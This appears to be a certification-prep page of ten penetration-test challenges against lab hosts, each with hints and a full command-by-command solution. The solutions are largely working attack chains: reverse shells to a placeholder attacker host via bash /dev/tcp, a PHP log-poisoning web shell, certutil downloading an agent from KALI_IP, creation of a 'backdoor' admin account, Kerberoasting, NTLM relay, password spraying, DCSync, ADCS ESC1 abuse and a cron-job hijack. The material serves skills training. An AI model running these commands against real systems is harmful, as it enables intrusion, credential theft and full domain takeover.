> Boss Challenges
10 full penetration test scenarios to validate your skills before the CPTS exam. Progressive hints available — attempt each scenario before revealing the solution.
BOSS-01
The Forgotten Admin Share
Medium
SMB · PrivEsc
▶
// SCENARIO
You are performing an internal pentest against a small corporate network. Your starting position: connected to the network with no credentials. Nmap reveals a Windows Server 2019 host at 10.10.10.50 with SMB (445), RDP (3389), and WinRM (5985) open. Your task: gain administrative access to this host.
// OBJECTIVES
- Enumerate all SMB shares (including hidden/admin shares)
- Identify accessible shares and extract credentials from any configuration files
- Use discovered credentials to gain initial foothold
- Escalate privileges to SYSTEM
- Document all findings in report format
// HINTS (attempt first)
Run
nxc smb 10.10.10.50 then nxc smb 10.10.10.50 -u '' -p '' --shares for null session share enumeration. Check for non-standard shares.If you find a readable share with config files, grep for password patterns. Try discovered credentials with
nxc smb 10.10.10.50 -u USER -p PASS --shares to see what you can now access.Check
whoami /priv after getting a shell. SeImpersonatePrivilege? Use PrintSpoofer or GodPotato.Step 1: SMB Enumeration
nxc smb 10.10.10.50 nxc smb 10.10.10.50 -u '' -p '' --shares enum4linux-ng -A 10.10.10.50
Step 2: Null Session Share Access
smbclient //10.10.10.50/IT_Config -N ls get web.config # web.config contains: connectionString="...password=Adm1nP@ss2024..."
Step 3: Credential Validation + Shell
nxc smb 10.10.10.50 -u svc_web -p 'Adm1nP@ss2024' evil-winrm -i 10.10.10.50 -u svc_web -p 'Adm1nP@ss2024'
Step 4: Privilege Escalation
whoami /priv # SeImpersonatePrivilege Enabled → GodPotato upload GodPotato-NET4.exe C:\Windows\Temp\gp.exe .\gp.exe -cmd "net user backdoor Pass123! /add && net localgroup administrators backdoor /add" # Login as backdoor via Evil-WinRM → SYSTEM-level access
BOSS-02
Web to Shell: The Exposed API
Medium
Web · Command Injection
▶
// SCENARIO
A web application runs on 10.10.10.60:80. Initial Nmap shows HTTP and SSH (22). The site is a simple inventory management tool with a search function. Your goal: achieve Remote Code Execution and gain a reverse shell.
- Fuzz the web application for hidden directories and parameters
- Identify and confirm command injection vulnerability
- Bypass any filters and obtain a reverse shell
- Escalate to root via discovered sudo rights
Use
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.10.10.60/FUZZ. Look for an API endpoint like /api/v1/.Test the search/query parameter with
; id, | id, && id. Check response body — if command output appears, you have injection.If spaces are filtered, use
${IFS} instead. If semicolons are blocked, try |. URL-encode if sending via GET parameter.Step 1: Directory Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \ -u http://10.10.10.60/FUZZ -mc 200,301,302 # Finds: /api/v1/search
Step 2: Confirm Command Injection
curl "http://10.10.10.60/api/v1/search?q=test;id" # Response: uid=33(www-data) gid=33(www-data)...
Step 3: Reverse Shell
# Start listener: nc -lvnp 4444 # Send shell payload (URL encoded): curl "http://10.10.10.60/api/v1/search?q=test;bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/KALI/4444%200>%261'"
Step 4: PrivEsc
sudo -l # (ALL) NOPASSWD: /usr/bin/vim sudo vim -c ':!/bin/bash' # Root shell!
BOSS-03
Active Directory First Blood
Hard
AD · Kerberoasting
▶
// SCENARIO
Internal network. You have compromised a low-privilege domain user account:
jdoe / Welcome1 on CORP.LOCAL (DC: 10.10.10.5). Your target: Domain Admin. No BloodHound data yet. Start from scratch and reach DA.
- Collect BloodHound data with the provided credentials
- Identify attack paths (Kerberoasting, AS-REP Roasting, or ACL abuse)
- Crack/exploit discovered hashes or paths
- DCSync to obtain all domain hashes
- Demonstrate DA access (list C$ on DC)
Run
bloodhound-python -u jdoe -p 'Welcome1' -d corp.local -dc-ip 10.10.10.5 -c All --zip. Also run impacket-GetUserSPNs corp.local/jdoe:'Welcome1' -dc-ip 10.10.10.5 -request.In BloodHound, mark jdoe as Owned. Run "Find Shortest Paths from Owned Principals." Also check "List all Kerberoastable Accounts."
After cracking the SPN hash: use the service account to check BloodHound for further paths. If it has DCSync rights →
impacket-secretsdump.Step 1: BloodHound Collection + Kerberoasting
bloodhound-python -u jdoe -p 'Welcome1' -d corp.local -dc-ip 10.10.10.5 -c All --zip impacket-GetUserSPNs corp.local/jdoe:'Welcome1' -dc-ip 10.10.10.5 -request -outputfile spns.txt
Step 2: Crack SPN Hash
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt # Cracked: svc_sql / SqlAdmin2024!
Step 3: BloodHound Path from svc_sql
# BloodHound shows: svc_sql → GenericWrite → HR_MANAGERS group # HR_MANAGERS → WriteDACL → Domain Admins # Add svc_sql to HR_MANAGERS: net rpc group addmem "HR_MANAGERS" "svc_sql" -U corp.local/svc_sql%'SqlAdmin2024!' -S 10.10.10.5
Step 4: WriteDACL → DCSync → DA
impacket-dacledit corp.local/svc_sql:'SqlAdmin2024!' -dc-ip 10.10.10.5 \ -action write -rights DCSync -principal svc_sql -target-dn "DC=corp,DC=local" impacket-secretsdump corp.local/svc_sql:'SqlAdmin2024!'@10.10.10.5 -just-dc-ntlm # Got: Administrator:500:...:8f617b3daa4f19d10b... nxc smb 10.10.10.5 -u Administrator -H 8f617b3daa4f19d10b... --shares
BOSS-04
The Database Pivot
Hard
SQLi · Pivoting
▶
// SCENARIO
External pentest. Target: a web application at 10.10.10.70 with a login form. Behind the DMZ is an internal network 172.16.5.0/24 that is not directly reachable from your Kali. Your goal: get RCE on a host in the internal network.
- Identify and exploit SQL injection in the login form
- Read files or execute OS commands via SQLi (MSSQL xp_cmdshell)
- Set up a tunnel to the internal network via the compromised host
- Enumerate and compromise a host in 172.16.5.0/24
Test
' OR '1'='1 in login. Check if it's MSSQL with error-based: ' AND 1=CONVERT(int,@@version)--. If MSSQL → xp_cmdshell available.Enable xp_cmdshell:
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- then '; EXEC xp_cmdshell 'whoami';--Upload Ligolo-ng agent via xp_cmdshell + certutil. Connect it to your Kali proxy. Add route for 172.16.5.0/24. Scan from Kali directly.
Step 1: SQLi + xp_cmdshell
sqlmap -u "http://10.10.10.70/login" --data "user=test&pass=test" \ --dbms=mssql --os-shell # sqlmap enables xp_cmdshell automatically, gives OS shell
Step 2: Upload Ligolo Agent
# In OS shell via sqlmap: xp_cmdshell "certutil -urlcache -split -f http://KALI_IP/agent.exe C:\Windows\Temp\agent.exe" xp_cmdshell "C:\Windows\Temp\agent.exe -connect KALI_IP:11601 -ignore-cert"
Step 3: Set Up Pivot
# Kali proxy console: session # select agent ifconfig # shows 172.16.5.0/24 interface sudo ip route add 172.16.5.0/24 dev ligolo start
Step 4: Compromise Internal Host
nmap -sV 172.16.5.0/24 --open -T4 # Finds: 172.16.5.10 with SMB open nxc smb 172.16.5.10 -u administrator -p 'Password123' # Reused creds from MSSQL sa account → admin on internal host!
BOSS-05
Certificate Authority Takeover
Expert
ADCS · ESC1
▶
// SCENARIO
Domain credentials obtained:
helpdesk / HelpD3sk! on ENTERPRISE.LOCAL. You have no other access. AD CS is deployed. BloodHound shows no obvious paths from helpdesk to DA. Find the ADCS vulnerability and escalate to Domain Admin.
- Enumerate AD CS for vulnerable templates
- Identify the ESC type and exploitation method
- Request a certificate as Domain Admin
- Authenticate as DA and perform DCSync
Run
certipy find -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' -dc-ip DC_IP -vulnerable -stdout. Look for templates where "Enrollee Supplies Subject" is true.ESC1:
certipy req -u helpdesk@enterprise.local -p 'HelpD3sk!' -ca ENTERPRISE-CA -template VulnTemplate -upn administrator@enterprise.local -dc-ip DC_IPcertipy auth -pfx administrator.pfx -dc-ip DC_IP gives NT hash. Use with secretsdump for full DCSync.Step 1: Find Vulnerable Template
certipy find -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' \ -dc-ip 10.10.10.5 -vulnerable -stdout # Output: Template "CorpUser" — ESC1 (Enrollee Supplies Subject: True, Any domain user can enroll)
Step 2: Request DA Certificate
certipy req -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' \ -ca 'ENTERPRISE-CA' -template 'CorpUser' \ -upn 'administrator@enterprise.local' -dc-ip 10.10.10.5 # Saved: administrator.pfx
Step 3: Authenticate + DCSync
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5 # NT Hash: 8f617b3daa4f19d1... impacket-secretsdump enterprise.local/administrator@10.10.10.5 -hashes :8f617b3daa4f19d1... -just-dc-ntlm
BOSS-06
LFI to Shell to Root
Medium
Web · LFI · PrivEsc
▶
// SCENARIO
PHP web application at 10.10.10.80. The site has a page parameter:
http://10.10.10.80/index.php?page=home. Your goal: escalate from LFI to Remote Code Execution and obtain root on the Linux server.
- Confirm LFI vulnerability and read sensitive files (/etc/passwd, SSH keys)
- Escalate LFI to RCE (log poisoning or PHP wrappers)
- Obtain a reverse shell and escalate to root
Try
?page=../../../../etc/passwd. If you see /etc/passwd content, LFI is confirmed. Also try ?page=../../../../var/log/apache2/access.log.Log poisoning:
curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.80/ — then ?page=../../../../var/log/apache2/access.log&cmd=id. Or use PHP filter wrapper: php://filter/convert.base64-encode/resource=index.php.Once you have a shell as www-data: run
sudo -l and find / -perm -4000 2>/dev/null. Check for writable cron jobs.Step 1: Confirm LFI
curl "http://10.10.10.80/index.php?page=../../../../etc/passwd" # Shows /etc/passwd content — LFI confirmed
Step 2: Log Poisoning → RCE
curl -A '' http://10.10.10.80/ curl "http://10.10.10.80/index.php?page=../../../../var/log/apache2/access.log&cmd=id" # uid=33(www-data) — RCE confirmed
Step 3: Reverse Shell
# URL-encode the bash reverse shell payload: curl "http://10.10.10.80/index.php?page=../../../../var/log/apache2/access.log&cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/KALI/4444%200>%261'"
Step 4: Root via SUID
find / -perm -4000 2>/dev/null
# /usr/bin/python3 has SUID bit!
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
whoami # root
BOSS-07
Poisoned Network
Hard
LLMNR · Relay · AD
▶
// SCENARIO
Newly connected to internal network segment 10.10.20.0/24. No credentials. 3 Windows hosts visible, all domain-joined to FINANCE.LOCAL. SMB signing status unknown. Your goal: capture or relay credentials to gain initial access.
- Identify hosts with SMB signing disabled (relay targets)
- Set up Responder + ntlmrelayx chain
- Capture or relay credentials to gain local admin
- Dump SAM and identify any domain accounts
nxc smb 10.10.20.0/24 --gen-relay-list relay-targets.txt — this lists hosts without SMB signing. If all hosts have signing enabled, fall back to hash capture and cracking.Edit /etc/responder/Responder.conf: SMB=Off, HTTP=Off. Then:
sudo impacket-ntlmrelayx -tf relay-targets.txt -smb2support and sudo responder -I eth0 -wfvIf relay gives SAM dump: use local admin hash for PTH across the network (
nxc smb 10.10.20.0/24 -u Administrator -H HASH --local-auth). Look for shared local admin passwords.Step 1: Find Relay Targets
nxc smb 10.10.20.0/24 --gen-relay-list relay-targets.txt # relay-targets.txt: 10.10.20.30, 10.10.20.40 (signing disabled)
Step 2: Responder + ntlmrelayx
# Terminal 1: impacket-ntlmrelayx -tf relay-targets.txt -smb2support # Terminal 2: sudo responder -I eth0 -wfv
Step 3: Triggered by LLMNR Broadcast
# After waiting ~2 min, a user tries to access \\fileserver (non-existent) # Responder answers → ntlmrelayx relays to 10.10.20.30 # SAM dump output: # Administrator:500:...:e3e3e3e3e3e3e3e3...::: (hash)
Step 4: Lateral Movement
nxc smb 10.10.20.0/24 -u Administrator -H e3e3e3e3e3e3e3e3 --local-auth # 10.10.20.30 [+] Admin # 10.10.20.40 [+] Admin ← shared local admin password! impacket-secretsdump -hashes :e3e3e3e3e3e3e3e3 ./Administrator@10.10.20.40 # Finds domain creds: FINANCE\domain_user:ComplexPass99!
BOSS-08
The Forgotten Backup
Medium
Password Attacks · Linux PrivEsc
▶
// SCENARIO
Linux server at 10.10.10.90. FTP anonymous login allowed. SSH on port 22. Web server on 8080 showing a maintenance page. Your goal: root on the Linux host using only the information available.
- Enumerate FTP and download all accessible files
- Crack any discovered password hashes
- Gain SSH access with recovered credentials
- Find privilege escalation path to root
ftp 10.10.10.90 → user: anonymous, pass: (blank). ls -la then mget *. Look in subdirectories too: cd backup && mget *If you find a shadow-like file or .htpasswd:
hashcat -m 1800 hash.txt rockyou.txt for SHA-512 hashes. hashcat -m 1600 for MD5 Apache hashes.After SSH: check
sudo -l, crontab -l, ls -la /etc/cron.d/. If there's a writable script called by root cron, modify it for a shell.Step 1: FTP Discovery
ftp 10.10.10.90 # anonymous login → found: /backup/shadow.bak get shadow.bak
Step 2: Crack Shadow Hash
grep 'sysadmin' shadow.bak # sysadmin:$6$rounds=5000$salt$hash...: hashcat -m 1800 shadow.bak /usr/share/wordlists/rockyou.txt # Cracked: sysadmin:Backup2024!
Step 3: SSH Login
ssh sysadmin@10.10.10.90
Step 4: Cron Job Hijack
cat /etc/cron.d/maintenance # */5 * * * * root /opt/scripts/cleanup.sh ls -la /opt/scripts/cleanup.sh # -rw-rw-r-- (world-writable!) echo 'bash -i >& /dev/tcp/KALI/4444 0>&1' >> /opt/scripts/cleanup.sh # Wait 5 min → root reverse shell
BOSS-09
ACL Chain to Domain Admin
Expert
AD · ACL Abuse
▶
// SCENARIO
You have compromised
it_support / Support123! on TARGET.LOCAL. BloodHound shows a complex ACL chain: it_support → GenericWrite on "IT_MANAGERS" group → IT_MANAGERS has WriteDACL on Domain. No direct Kerberoastable accounts visible. Navigate the chain.
- Add yourself (it_support) to the IT_MANAGERS group
- Use WriteDACL on Domain to grant DCSync rights
- Perform DCSync and dump all hashes
- Pass-the-Hash as Domain Admin
PowerView:
Add-DomainGroupMember -Identity 'IT_MANAGERS' -Members 'it_support' -Credential $cred. Or via net rpc: net rpc group addmem "IT_MANAGERS" "it_support" -U target.local/it_support%Support123! -S DC_IPNow IT_MANAGERS member: use WriteDACL to grant DCSync.
impacket-dacledit target.local/it_support:'Support123!' -action write -rights DCSync -principal it_support -target-dn "DC=target,DC=local" -dc-ip DC_IPimpacket-secretsdump target.local/it_support:'Support123!'@DC_IP -just-dc-ntlm → get DA hash → PTH.Step 1: Add to IT_MANAGERS via GenericWrite
net rpc group addmem "IT_MANAGERS" "it_support" \ -U target.local/it_support%'Support123!' -S 10.10.10.5 # Verify: net rpc group members "IT_MANAGERS" -U target.local/it_support%'Support123!' -S 10.10.10.5
Step 2: Grant DCSync via WriteDACL
impacket-dacledit target.local/it_support:'Support123!' \ -dc-ip 10.10.10.5 -action write -rights DCSync \ -principal it_support -target-dn "DC=target,DC=local"
Step 3: DCSync + PTH
impacket-secretsdump target.local/it_support:'Support123!'@10.10.10.5 -just-dc-ntlm # Administrator:500:...:c1c1c1c1...::: nxc smb 10.10.10.5 -u Administrator -H c1c1c1c1... --shares impacket-psexec target.local/Administrator@10.10.10.5 -hashes :c1c1c1c1...
BOSS-10
The Full Chain: External to DA
Expert
Full Chain · All Skills
▶
// SCENARIO
External pentest. Scope:
megacorp.com. No credentials. You have: the domain name, a VPN into the corporate network segment. Your target: Domain Admin on MEGACORP.LOCAL. This is the capstone challenge — no guided path, find your own way.
- External reconnaissance (subdomain enum, OSINT, web fingerprinting)
- Identify and exploit a web vulnerability for initial foothold
- Pivot from DMZ to internal domain
- Enumerate AD and find a path to DA
- Achieve Domain Admin and document full attack chain
- Write a professional executive summary (3-5 sentences)
Sublist3r or subfinder for subdomain enum. Shodan for exposed services. theHarvester for email/employee names. Check LinkedIn for IT staff → potential usernames for spray.
If you find a login portal: spray discovered usernames with common passwords (Company2024!, Season+Year). If web app: test for SQLi, LFI, upload vulnerabilities.
Once on internal network with domain creds: BloodHound collection → find AS-REP Roastable accounts or Kerberoastable SPNs → crack → find ACL path or check ADCS.
Step 1: External Recon
subfinder -d megacorp.com -o subs.txt httpx -l subs.txt -status-code -title # Found: vpn.megacorp.com, mail.megacorp.com, dev.megacorp.com theHarvester -d megacorp.com -b google,linkedin -l 200 # Employees: john.smith, sarah.jones, mike.admin
Step 2: Password Spray on Mail Portal
kerbrute userenum --dc 10.10.10.5 -d megacorp.local usernames.txt # Valid: jsmith, sjones, madmin nxc smb 10.10.10.5 -u users.txt -p 'Megacorp2024!' --continue-on-success # jsmith:Megacorp2024! ← valid!
Step 3: AD Enumeration + AS-REP Roast
bloodhound-python -u jsmith -p 'Megacorp2024!' -d megacorp.local -dc-ip 10.10.10.5 -c All --zip impacket-GetNPUsers megacorp.local/ -usersfile users.txt -request -dc-ip 10.10.10.5 # Got AS-REP hash for svc_backup hashcat -m 18200 asrep.txt rockyou.txt # Cracked: svc_backup:Backup@2024
Step 4: ADCS ESC1 → DA
certipy find -u svc_backup@megacorp.local -p 'Backup@2024' -dc-ip 10.10.10.5 -vulnerable -stdout # ESC1: Template "EmployeeCert" certipy req -u svc_backup@megacorp.local -p 'Backup@2024' \ -ca MEGACORP-CA -template EmployeeCert \ -upn administrator@megacorp.local -dc-ip 10.10.10.5 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5 impacket-secretsdump megacorp.local/administrator@10.10.10.5 -hashes :<hash> -just-dc-ntlm
Executive Summary (Example)
During the assessment of MEGACORP.LOCAL, critical vulnerabilities were identified that allowed an unauthenticated external attacker to achieve full Domain Admin compromise. The attack chain began with OSINT-derived employee usernames, proceeded through a successful password spray attack, and culminated in exploitation of a misconfigured Active Directory Certificate Services template (ESC1) that allowed privilege escalation to Domain Administrator without requiring any existing privileged access. Immediate remediation of the ADCS template misconfiguration and enforcement of multi-factor authentication on all external-facing portals is strongly recommended.